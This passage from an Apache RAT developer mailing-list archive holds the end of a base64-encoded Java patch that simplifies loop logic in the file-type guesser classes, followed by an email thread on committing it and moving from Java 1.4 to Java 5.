bmFsIFN0cmluZyBuYW1lKSB7CiAgICAgICAgIGlmIChuYW1lID09IG51bGwpIHtyZXR1cm4gZmFs c2U7fQogICAgICAgICBTdHJpbmcgbmFtZVRvTG93ZXIgPSBuYW1lLnRvTG93ZXJDYXNlKExvY2Fs ZS5VUyk7Ci0gICAgICAgIGJvb2xlYW4gcmVzdWx0ID0gZmFsc2U7Ci0gICAgICAgIGZvciAoaW50 IGkgPSAwOyAhcmVzdWx0ICYmIGkgPCBBcmNoaXZlR3Vlc3Nlci5BUkNISVZFX0VYVEVOU0lPTlMu bGVuZ3RoOyBpKyspIHsKLSAgICAgICAgICAgIHJlc3VsdCA9IG5hbWVUb0xvd2VyLmVuZHNXaXRo KCIuIiArIEFyY2hpdmVHdWVzc2VyLkFSQ0hJVkVfRVhURU5TSU9OU1tpXSk7CisgICAgICAgIGZv ciAoaW50IGkgPSAwOyBpIDwgQXJjaGl2ZUd1ZXNzZXIuQVJDSElWRV9FWFRFTlNJT05TLmxlbmd0 aDsgaSsrKSB7CisgICAgICAgICAgICBpZiAobmFtZVRvTG93ZXIuZW5kc1dpdGgoIi4iICsgQXJj aGl2ZUd1ZXNzZXIuQVJDSElWRV9FWFRFTlNJT05TW2ldKSkKKyAgICAgICAgICAgIAlyZXR1cm4g dHJ1ZTsKICAgICAgICAgfQotICAgICAgICByZXR1cm4gcmVzdWx0OworICAgICAgICByZXR1cm4g ZmFsc2U7CiAgICAgfQogCiB9CkluZGV4OiBhcGFjaGUtcmF0LWNvcmUvc3JjL21haW4vamF2YS9v cmcvYXBhY2hlL3JhdC9kb2N1bWVudC9pbXBsL2d1ZXNzZXIvQmluYXJ5R3Vlc3Nlci5qYXZhCj09 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09 PT09PT09PT0KLS0tIGFwYWNoZS1yYXQtY29yZS9zcmMvbWFpbi9qYXZhL29yZy9hcGFjaGUvcmF0 L2RvY3VtZW50L2ltcGwvZ3Vlc3Nlci9CaW5hcnlHdWVzc2VyLmphdmEJKHJldmlzaW9uIDk4MjI3 NCkKKysrIGFwYWNoZS1yYXQtY29yZS9zcmMvbWFpbi9qYXZhL29yZy9hcGFjaGUvcmF0L2RvY3Vt ZW50L2ltcGwvZ3Vlc3Nlci9CaW5hcnlHdWVzc2VyLmphdmEJKHdvcmtpbmcgY29weSkKQEAgLTYy LDcgKzYyLDYgQEAgcHVibGljIGNsYXNzIEJpbmFyeUd1ZXNzZXIgewogICAgICAqIERvIHRoZSBm aXJzdCBmZXcgYnl0ZXMgb2YgdGhlIHN0cmVhbSBoaW50IGF0IGEgYmluYXJ5IGZpbGU/CiAgICAg ICovCiAgICAgcHVibGljIHN0YXRpYyBib29sZWFuIGlzQmluYXJ5KFJlYWRlciBpbikgewotICAg ICAgICBib29sZWFuIHJlc3VsdCA9IGZhbHNlOwogICAgICAgICBjaGFyW10gdGFzdGUgPSBuZXcg Y2hhclsxMDBdOwogICAgICAgICB0cnkgewogICAgICAgICAgICAgaW50IGJ5dGVzUmVhZCA9IGlu LnJlYWQodGFzdGUpOwpAQCAtNzYsMTMgKzc1LDEzIEBAIHB1YmxpYyBjbGFzcyBCaW5hcnlHdWVz c2VyIHsKICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgaWYgKGhpZ2hCeXRlcyAq IEJpbmFyeUd1ZXNzZXIuSElHSF9CWVRFU19SQVRJTwogICAgICAgICAgICAgICAgICAgICA+IGJ5 dGVzUmVhZCAqIEJpbmFyeUd1ZXNzZXIuVE9UQUxfUkVBRF9SQVRJTykgewotICAgICAgICAgICAg ICAgICAgICByZXN1bHQgPSB0cnVlOworICAgICAgICAgICAgICAgICAgICByZXR1cm4gdHJ1ZTsK ICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICB9CiAgICAgICAgIH0gY2F0Y2ggKElPRXhj ZXB0aW9uIGUpIHsKICAgICAgICAgICAgIC8vIFNXQUxMT1cgCiAgICAgICAgIH0KLSAgICAgICAg cmV0dXJuIHJlc3VsdDsKKyAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgIH0KIAogICAgIHB1Ymxp YyBzdGF0aWMgZmluYWwgYm9vbGVhbiBpc0JpbmFyeURhdGEoZmluYWwgU3RyaW5nIG5hbWUpIHsK QEAgLTEwNSwyMCArMTA0LDIwIEBAIHB1YmxpYyBjbGFzcyBCaW5hcnlHdWVzc2VyIHsKIAogICAg IHB1YmxpYyBzdGF0aWMgYm9vbGVhbiBjb250YWluc0V4dGVuc2lvbihmaW5hbCBTdHJpbmcgbmFt ZSwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZpbmFsIFN0 cmluZ1tdIGV4dHMpIHsKLSAgICAgICAgYm9vbGVhbiByZXN1bHQgPSBmYWxzZTsKLSAgICAgICAg Zm9yIChpbnQgaSA9IDA7ICFyZXN1bHQgJiYgaSA8IGV4dHMubGVuZ3RoOyBpKyspIHsKLSAgICAg ICAgICAgIHJlc3VsdCA9IG5hbWUuaW5kZXhPZigiLiIgKyBleHRzW2ldICsgIi4iKSA+PSAwOwor ICAgICAgICBmb3IgKGludCBpID0gMDsgaSA8IGV4dHMubGVuZ3RoOyBpKyspIHsKKyAgICAgICAg ICAgIGlmIChuYW1lLmluZGV4T2YoIi4iICsgZXh0c1tpXSArICIuIikgPj0gMCkKKyAgICAgICAg ICAgIAlyZXR1cm4gdHJ1ZTsKICAgICAgICAgfQotICAgICAgICByZXR1cm4gcmVzdWx0OworICAg ICAgICByZXR1cm4gZmFsc2U7CiAgICAgfQogCiAgICAgcHVibGljIHN0YXRpYyBib29sZWFuIGV4 dGVuc2lvbk1hdGNoZXMoZmluYWwgU3RyaW5nIG5hbWUsCiAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgIGZpbmFsIFN0cmluZ1tdIGV4dHMpIHsKLSAgICAgICAgYm9v bGVhbiByZXN1bHQgPSBmYWxzZTsKLSAgICAgICAgZm9yIChpbnQgaSA9IDA7ICFyZXN1bHQgJiYg aSA8IGV4dHMubGVuZ3RoOyBpKyspIHsKLSAgICAgICAgICAgIHJlc3VsdCA9IG5hbWUuZW5kc1dp dGgoIi4iICsgZXh0c1tpXSk7CisgICAgICAgIGZvciAoaW50IGkgPSAwOyBpIDwgZXh0cy5sZW5n dGg7IGkrKykgeworICAgICAgICAgICAgaWYgKG5hbWUuZW5kc1dpdGgoIi4iICsgZXh0c1tpXSkp CisgICAgICAgICAgICAJcmV0dXJuIHRydWU7CiAgICAgICAgIH0KLSAgICAgICAgcmV0dXJuIHJl c3VsdDsKKyAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgIH0KIAogICAgIHB1YmxpYyBzdGF0aWMg Ym9vbGVhbiBpc0J5dGVjb2RlKGZpbmFsIFN0cmluZyBuYW1lKSB7CkBAIC0yNzIsMTQgKzI3MSwx MSBAQCBwdWJsaWMgY2xhc3MgQmluYXJ5R3Vlc3NlciB7CiAgICAgICAgIC8vIFRPRE86IHJlaW1w bGVtZW50IHRoZSBiaW5hcnkgdGVzdCBhbGdvcml0aG0/CiAgICAgICAgIC8vIFRPRE86IG1vcmUg ZWZmaWNpZW50IHRvIG1vdmUgaW50byBzdGFuZGFyZCBhbmFseXNpcwogICAgICAgICAvLyBUT0RP OiB0aGVuIHVzZSBiaW5hcnkgYXMgZGVmYXVsdAotICAgICAgICBmaW5hbCBTdHJpbmcgbmFtZSA9 IGRvY3VtZW50LmdldE5hbWUoKTsKLSAgICAgICAgYm9vbGVhbiByZXN1bHQgPSBpc0JpbmFyeShu YW1lKTsKLSAgICAgICAgaWYgKCFyZXN1bHQpCi0gICAgICAgIHsKLSAgICAgICAgICAgIC8vIHRy eSBhIHRhc3RlCi0gICAgICAgICAgICByZXN1bHQgPSBpc0JpbmFyeURvY3VtZW50KGRvY3VtZW50 KTsKLSAgICAgICAgfQotICAgICAgICByZXR1cm4gcmVzdWx0OworICAgICAgICBpZiAoaXNCaW5h cnkoZG9jdW1lbnQuZ2V0TmFtZSgpKSkKKyAgICAgICAgCXJldHVybiB0cnVlOworICAgICAgICAK KyAgICAgICAgLy8gdHJ5IGEgdGFzdGUKKyAgICAgICAgcmV0dXJuIGlzQmluYXJ5RG9jdW1lbnQo ZG9jdW1lbnQpOwogICAgIH0KIAogCkluZGV4OiBhcGFjaGUtcmF0LWNvcmUvc3JjL21haW4vamF2 YS9vcmcvYXBhY2hlL3JhdC9kb2N1bWVudC9pbXBsL2d1ZXNzZXIvTm90ZUd1ZXNzZXIuamF2YQo9 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09 PT09PT09PT09Ci0tLSBhcGFjaGUtcmF0LWNvcmUvc3JjL21haW4vamF2YS9vcmcvYXBhY2hlL3Jh dC9kb2N1bWVudC9pbXBsL2d1ZXNzZXIvTm90ZUd1ZXNzZXIuamF2YQkocmV2aXNpb24gOTgyMjc0 KQorKysgYXBhY2hlLXJhdC1jb3JlL3NyYy9tYWluL2phdmEvb3JnL2FwYWNoZS9yYXQvZG9jdW1l bnQvaW1wbC9ndWVzc2VyL05vdGVHdWVzc2VyLmphdmEJKHdvcmtpbmcgY29weSkKQEAgLTYwLDE3 ICs2MCwxOSBAQCBwdWJsaWMgY2xhc3MgTm90ZUd1ZXNzZXIgewogICAgICAgICBMaXN0IGwgPSBB cnJheXMuYXNMaXN0KE5vdGVHdWVzc2VyLk5PVEVfRklMRV9OQU1FUyk7CiAgICAgICAgIFN0cmlu ZyBub3JtYWxpc2VkTmFtZSA9IEd1ZXNzVXRpbHMubm9ybWFsaXNlKG5hbWUpOwogICAgICAgICAK LSAgICAgICAgYm9vbGVhbiByZXN1bHQgPSBsLmNvbnRhaW5zKG5hbWUpIHx8IGwuY29udGFpbnMo bm9ybWFsaXNlZE5hbWUpOwotICAgICAgICBmb3IgKGludCBpID0gMDsgIXJlc3VsdCAmJiBpIDwg Tm90ZUd1ZXNzZXIuTk9URV9GSUxFX0VYVEVOU0lPTlMubGVuZ3RoOyBpKyspIHsKLSAgICAgICAg ICAgIHJlc3VsdCA9IG5vcm1hbGlzZWROYW1lLmVuZHNXaXRoKCIuIiArIE5vdGVHdWVzc2VyLk5P VEVfRklMRV9FWFRFTlNJT05TW2ldKTsKKyAgICAgICAgaWYgKGwuY29udGFpbnMobmFtZSkgfHwg bC5jb250YWlucyhub3JtYWxpc2VkTmFtZSkpCisgICAgICAgIAlyZXR1cm4gdHJ1ZTsKKworICAg ICAgICBmb3IgKGludCBpID0gMDsgaSA8IE5vdGVHdWVzc2VyLk5PVEVfRklMRV9FWFRFTlNJT05T Lmxlbmd0aDsgaSsrKSB7CisgICAgICAgICAgICBpZiAobm9ybWFsaXNlZE5hbWUuZW5kc1dpdGgo Ii4iICsgTm90ZUd1ZXNzZXIuTk9URV9GSUxFX0VYVEVOU0lPTlNbaV0pKQorICAgICAgICAgICAg CXJldHVybiB0cnVlOwogICAgICAgICB9Ci0gICAgICAgIHJldHVybiByZXN1bHQ7CisgICAgICAg IAorICAgICAgICByZXR1cm4gZmFsc2U7CiAgICAgfQogCiAgICAgcHVibGljIHN0YXRpYyBmaW5h bCBib29sZWFuIGlzTm90ZShmaW5hbCBEb2N1bWVudCBkb2N1bWVudCkgewotICAgICAgICBmaW5h bCBTdHJpbmcgbmFtZSA9IGRvY3VtZW50LmdldE5hbWUoKTsKLSAgICAgICAgZmluYWwgYm9vbGVh biByZXN1bHQgPSBpc05vdGUobmFtZSk7Ci0gICAgICAgIHJldHVybiByZXN1bHQ7CisgICAgCXJl dHVybiBpc05vdGUoZG9jdW1lbnQuZ2V0TmFtZSgpKTsKICAgICB9CiAKIH0K --00c09f93d928f09dd3048d00e3dd-- From [email protected] Wed Aug 04 20:05:09 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 89098 invoked from network); 4 Aug 2010 20:05:09 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 4 Aug 2010 20:05:09 -0000 Received: (qmail 76640 invoked by uid 500); 4 Aug 2010 20:05:09 -0000 Delivered-To: [email protected] Received: (qmail 76588 invoked by uid 500); 4 Aug 2010 20:05:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 76580 invoked by uid 99); 4 Aug 2010 20:05:09 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Aug 2010 20:05:09 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO samaflost.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Aug 2010 20:05:01 +0000 Received: from localhost (localhost.localdomain [161.129.204.104]) by samaflost.de (Postfix) with ESMTP id E898240E000A for <[email protected]>; Wed, 4 Aug 2010 22:04:40 +0200 (CEST) Received: from samaflost.de ([161.129.204.104]) by localhost (v35516.1blu.de [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id j8K1ymAf1tfI for <[email protected]>; Wed, 4 Aug 2010 22:04:40 +0200 (CEST) Received: by samaflost.de (Postfix, from userid 1000) id 5545640E0009; Wed, 4 Aug 2010 22:04:40 +0200 (CEST) From: Stefan Bodewig <[email protected]> To: [email protected] Subject: Re: [PATCH] References: <[email protected]> X-Draft-From: ("nnfolder:mail.rat" 1012) Date: Wed, 04 Aug 2010 22:04:40 +0200 In-Reply-To: <[email protected]> (Hyrum Wright's message of "Wed, 4 Aug 2010 10:14:30 -0500") Message-ID: <[email protected]> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/23.2 (gnu/linux) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org On 2010-08-04, Hyrum Wright wrote: > In going through the codebase, I noticed a few areas among the > guessers that seemed a little verbose. Agreed (I've never been looked at that code myself so far), maybe the code wanted to avid multiple exits from the methods? > The attached patch cleans them up a bit. Slightly modified version (added braces for one line ifs and I couldn't hold myself from simplifying one more line) went in as svn revision 982385. > Also, I'm a bit curious why we still require a source version of Java > 1.4. Not sure, my guess is that we didn't have a compelling reason to use Java5 features so far. There is a JIRA issue open that want to see us move to Java5. Stefan From [email protected] Wed Aug 04 20:11:54 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93742 invoked from network); 4 Aug 2010 20:11:53 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 4 Aug 2010 20:11:53 -0000 Received: (qmail 86381 invoked by uid 500); 4 Aug 2010 20:11:53 -0000 Delivered-To: [email protected] Received: (qmail 86331 invoked by uid 500); 4 Aug 2010 20:11:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 86323 invoked by uid 99); 4 Aug 2010 20:11:53 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Aug 2010 20:11:53 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mail-qy0-f182.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Aug 2010 20:11:45 +0000 Received: by qyk32 with SMTP id 32so4741225qyk.6 for <[email protected]>; Wed, 04 Aug 2010 13:11:24 -0700 (PDT) MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id c8mr4235984qab.70.1280952684327; Wed, 04 Aug 2010 13:11:24 -0700 (PDT) Sender: [email protected] Received: by 161.129.204.104 with HTTP; Wed, 4 Aug 2010 13:11:24 -0700 (PDT) X-Originating-IP: [161.129.204.104] In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Wed, 4 Aug 2010 15:11:24 -0500 X-Google-Sender-Auth: R078Znciu15YomGd3NQ_2Anr_vA Message-ID: <[email protected]> Subject: Re: [PATCH] From: "Hyrum K. Wright" <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable On Wed, Aug 4, 2010 at 3:04 PM, Stefan Bodewig <[email protected]> wrote: > On 2010-08-04, Hyrum Wright wrote: > >> In going through the codebase, I noticed a few areas among the >> guessers that seemed a little verbose. > > Agreed (I've never been looked at that code myself so far), maybe the > code wanted to avid multiple exits from the methods? > >> The attached patch cleans them up a bit. > > Slightly modified version (added braces for one line ifs and I couldn't > hold myself from simplifying one more line) went in as svn revision > 982385. Thanks, and sorry about the rather abrupt subject line (I forgot to fill in the rest before sending the mail!) >> Also, I'm a bit curious why we still require a source version of Java >> 1.4. > > Not sure, my guess is that we didn't have a compelling reason to use > Java5 features so far. =A0There is a JIRA issue open that want to see us > move to Java5. I'm interested mainly to clean up the various loop iterations. I don't know how much the use of generics would benefit us. -Hyrum From [email protected] Wed Aug 04 20:41:05 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5871 invoked from network); 4 Aug 2010 20:41:05 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 4 Aug 2010 20:41:05 -0000 Received: (qmail 37804 invoked by uid 500); 4 Aug 2010 20:41:05 -0000 Delivered-To: [email protected] Received: (qmail 37752 invoked by uid 500); 4 Aug 2010 20:41:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 37742 invoked by uid 99); 4 Aug 2010 20:41:04 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Aug 2010 20:41:04 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO samaflost.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Aug 2010 20:40:58 +0000 Received: from localhost (localhost.localdomain [161.129.204.104]) by samaflost.de (Postfix) with ESMTP id 3261D40E000A for <[email protected]>; Wed, 4 Aug 2010 22:40:36 +0200 (CEST) Received: from samaflost.de ([161.129.204.104]) by localhost (v35516.1blu.de [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id APC3-WnAS8cd for <[email protected]>; Wed, 4 Aug 2010 22:40:35 +0200 (CEST) Received: by samaflost.de (Postfix, from userid 1000) id AE04E40E0009; Wed, 4 Aug 2010 22:40:35 +0200 (CEST) From: Stefan Bodewig <[email protected]> To: [email protected] Subject: Re: [PATCH] References: <[email protected]> <[email protected]> <[email protected]> X-Draft-From: ("nnfolder:mail.rat" 1015) Date: Wed, 04 Aug 2010 22:40:33 +0200 In-Reply-To: <[email protected]> (Hyrum K. Wright's message of "Wed, 4 Aug 2010 15:11:24 -0500") Message-ID: <[email protected]> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/23.2 (gnu/linux) MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable On 2010-08-04, Hyrum K. Wright wrote: > Thanks, and sorry about the rather abrupt subject line (I forgot to > fill in the rest before sending the mail!) No problem. > On Wed, Aug 4, 2010 at 3:04 PM, Stefan Bodewig <[email protected]> wrote: >> On 2010-08-04, Hyrum Wright wrote: >>> Also, I'm a bit curious why we still require a source version of Java >>> 1.4. >> Not sure, my guess is that we didn't have a compelling reason to use >> Java5 features so far. =C2=A0There is a JIRA issue open that want to see= us >> move to Java5. > I'm interested mainly to clean up the various loop iterations. I > don't know how much the use of generics would benefit us. Agreed. There may be places where we could benefit from enums as well. But even then most changes would be cosmetic and so far nobody wanted to invest time into it. You're welcome 8-) Even though Ant still lives in Java 1.4 land, there wouldn't be any problem with an Antlib that required Java 5 - Maven 2.2 requires Java5 by now. I don't really think we are sticking with Java 1.4 for any real reason other than "nobody has started the migration". I'd be fine with Java5 - once the 0.7 version has been released, that is. Stefan From [email protected] Wed Aug 04 21:34:55 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 56558 invoked from network); 4 Aug 2010 21:34:55 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 4 Aug 2010 21:34:55 -0000 Received: (qmail 1552 invoked by uid 500); 4 Aug 2010 21:34:55 -0000 Delivered-To: [email protected] Received: (qmail 1505 invoked by uid 500); 4 Aug 2010 21:34:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 1497 invoked by uid 99); 4 Aug 2010 21:34:54 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Aug 2010 21:34:54 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mail-qy0-f182.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Aug 2010 21:34:45 +0000 Received: by qyk32 with SMTP id 32so4822376qyk.6 for <[email protected]>; Wed, 04 Aug 2010 14:34:24 -0700 (PDT) MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id 2mr4260974qaj.34.1280957664195; Wed, 04 Aug 2010 14:34:24 -0700 (PDT) Sender: [email protected] Received: by 161.129.204.104 with HTTP; Wed, 4 Aug 2010 14:34:24 -0700 (PDT) X-Originating-IP: [161.129.204.104] In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Wed, 4 Aug 2010 16:34:24 -0500 X-Google-Sender-Auth: xgEjk_7VIBTF6zJYa83RBcR21-E Message-ID: <[email protected]> Subject: Re: [PATCH] From: "Hyrum K. Wright" <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable On Wed, Aug 4, 2010 at 3:40 PM, Stefan Bodewig <[email protected]> wrote: > On 2010-08-04, Hyrum K. Wright wrote: > >> Thanks, and sorry about the rather abrupt subject line (I forgot to >> fill in the rest before sending the mail!) > > No problem. > >> On Wed, Aug 4, 2010 at 3:04 PM, Stefan Bodewig <[email protected]> wrot= e: >>> On 2010-08-04, Hyrum Wright wrote: > >>>> Also, I'm a bit curious why we still require a source version of Java >>>> 1.4. > >>> Not sure, my guess is that we didn't have a compelling reason to use >>> Java5 features so far. =A0There is a JIRA issue open that want to see u= s >>> move to Java5. > >> I'm interested mainly to clean up the various loop iterations. =A0I >> don't know how much the use of generics would benefit us. > > Agreed. =A0There may be places where we could benefit from enums as well. > But even then most changes would be cosmetic and so far nobody wanted to > invest time into it. =A0You're welcome 8-) Well, we can at least change the source and target Java versions, which removes the 1.4 restriction, and then just change stuff as it comes along. There isn't any requirement (that I know of) that a 1.5 conversion happen en masse. I'd be happy to help as a diversion from $REAL_WORK. (This coming from the guy is is also subverting RAT by writing a competitor= . :) > Even though Ant still lives in Java 1.4 land, there wouldn't be any > problem with an Antlib that required Java 5 - Maven 2.2 requires Java5 > by now. =A0I don't really think we are sticking with Java 1.4 for any rea= l > reason other than "nobody has started the migration". > > I'd be fine with Java5 - once the 0.7 version has been released, that > is. Agreed. -Hyrum From [email protected] Thu Aug 05 06:03:19 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88842 invoked from network); 5 Aug 2010 06:03:19 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 5 Aug 2010 06:03:19 -0000 Received: (qmail 37122 invoked by uid 500); 5 Aug 2010 06:03:19 -0000 Delivered-To: [email protected] Received: (qmail 37071 invoked by uid 500); 5 Aug 2010 06:03:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 37059 invoked by uid 99); 5 Aug 2010 06:03:17 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 06:03:17 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-qy0-f182.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 06:03:09 +0000 Received: by qyk32 with SMTP id 32so5126270qyk.6 for <[email protected]>; Wed, 04 Aug 2010 23:02:48 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=M6C3ubygDmBrnRcH0LBCivTHzi33s1uql5h32eMXZQI=; b=lOk5Vtq31np+H36jmbH/3ch+Ml4z+62e3F8wQYy0hkhFUWczGyI4jFefoPdWXlmY0v VeNRMd4kWmm/fHCyS7PQlyddHQtRS4QLmQipBShUtchtoux+LGRBOqPqi8Xdddl2dejA BCbPGqbs12avLZEkYl5ODqR18SjTD4zRINhSo= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=aY/kSHLf3xt6KURHJgalCRj/LhtAORL936MF5nsPQNFpvECOyan1vKvdsqf9uesxui RaSLA4WJKjw9dk3qODH3oOuZi5BJN1pCz6cqJI4/Oh9l4AFe2U9N4aoXCpz3Sl+Y4MzI 6o08OJAS1DlSwnQVUgE2JRUx7JHhX+CrNtOu8= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id r9mr4507159qar.151.1280988168397; Wed, 04 Aug 2010 23:02:48 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 4 Aug 2010 23:02:48 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 5 Aug 2010 08:02:48 +0200 Message-ID: <[email protected]> Subject: Re: [PATCH] From: Jochen Wiedmann <[email protected]> To: [email protected] Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org On Wed, Aug 4, 2010 at 10:40 PM, Stefan Bodewig <[email protected]> wrote: > Even though Ant still lives in Java 1.4 land, there wouldn't be any > problem with an Antlib that required Java 5 - Maven 2.2 requires Java5 > by now. =C2=A0I don't really think we are sticking with Java 1.4 for any = real > reason other than "nobody has started the migration". RAT is an important tool for Ant based builds. As Maven now depends on Java 1.5, I'd prefer to wait for Ant. OTOH, I'd also have no problems with Retroweaver, or something similar. Jochen --=20 Germanys national anthem is the most boring in the world - how telling! From [email protected] Thu Aug 05 10:39:24 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91964 invoked from network); 5 Aug 2010 10:39:23 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 5 Aug 2010 10:39:23 -0000 Received: (qmail 89975 invoked by uid 500); 5 Aug 2010 10:39:23 -0000 Delivered-To: [email protected] Received: (qmail 89925 invoked by uid 500); 5 Aug 2010 10:39:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 89911 invoked by uid 99); 5 Aug 2010 10:39:20 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 10:39:20 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-qw0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 10:39:15 +0000 Received: by qwg8 with SMTP id 8so3944662qwg.6 for <[email protected]>; 